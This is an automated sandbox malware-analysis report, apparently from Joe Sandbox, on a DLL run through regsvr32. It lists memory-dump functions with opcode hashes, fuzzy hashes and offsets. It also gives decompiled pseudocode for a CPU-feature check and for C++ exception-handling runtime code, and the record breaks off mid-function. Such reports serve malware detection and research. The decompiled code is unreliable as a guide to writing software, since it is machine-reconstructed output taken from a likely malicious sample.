                                                                                                                                                                                                                    Function 0258B83C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                                    • Instruction ID: 3a4275e3ef8255989bb93e92c1f56f50b877df3c22cd9c9d0fc4f3c1cdea4b14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E5128709047498BDF48CF68C8895DEBBF1FB48318F11875CE88AA7260D7B89A44CF49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025890F8 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                                    • Instruction ID: 7be131ce2e1052897db5017e7d012c86a9c029eb291efd88b0704bc9bb0f4d89
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5351B2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596250D7B4D6A5CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02595CC4 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                                    • Instruction ID: 88edde638acfdd0acd2d66cb09291733cda7eae175c990a9ed4a34bcb2e91eb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3551B4B090038E8FDB88CF68D88A5CE7BF0FB58358F104619E865A6250D3B8D664CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025A5450 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                                    • Instruction ID: c60eca204f85670e3552d5de061dbac5fb1319eeacc4cdd71ee2feaaa9738a3a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251ADB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19EC25A6250D3B8D665CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259CC84 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                                    • Instruction ID: 92920d2fa19092ff9f67baef998c1c38e7c975367aee29a108304f1ae9c3cfb0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F41C2B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D3B8D6A4CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258FFB8 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                                    • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02598E08 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                                    • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02594F18 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                                    • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025915C8 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                                    • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00000001800070A0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                    			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}







                                                                                                                                                                                                                    0x1800070a0
                                                                                                                                                                                                                    0x1800070a6
                                                                                                                                                                                                                    0x1800070ab
                                                                                                                                                                                                                    0x1800070b2
                                                                                                                                                                                                                    0x1800070b2
                                                                                                                                                                                                                    0x1800070b9
                                                                                                                                                                                                                    0x1800070bb
                                                                                                                                                                                                                    0x1800070c3
                                                                                                                                                                                                                    0x1800070c9
                                                                                                                                                                                                                    0x1800070cd
                                                                                                                                                                                                                    0x1800070d3
                                                                                                                                                                                                                    0x1800070d7
                                                                                                                                                                                                                    0x1800070e1
                                                                                                                                                                                                                    0x1800070eb
                                                                                                                                                                                                                    0x1800070f6
                                                                                                                                                                                                                    0x1800070fa
                                                                                                                                                                                                                    0x180007101
                                                                                                                                                                                                                    0x18000710f

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                                    • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: GestureInfo$CloseHandle
                                                                                                                                                                                                                    • String ID: 8
                                                                                                                                                                                                                    • API String ID: 372500805-4194326291
                                                                                                                                                                                                                    • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                                    • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                                                                                                                    • String ID: i
                                                                                                                                                                                                                    • API String ID: 3181456275-3865851505
                                                                                                                                                                                                                    • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                                                                                                                                    • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1917832262-0
                                                                                                                                                                                                                    • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                                                                                                                                    • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                    			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0xaaf8a09cc6d2
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
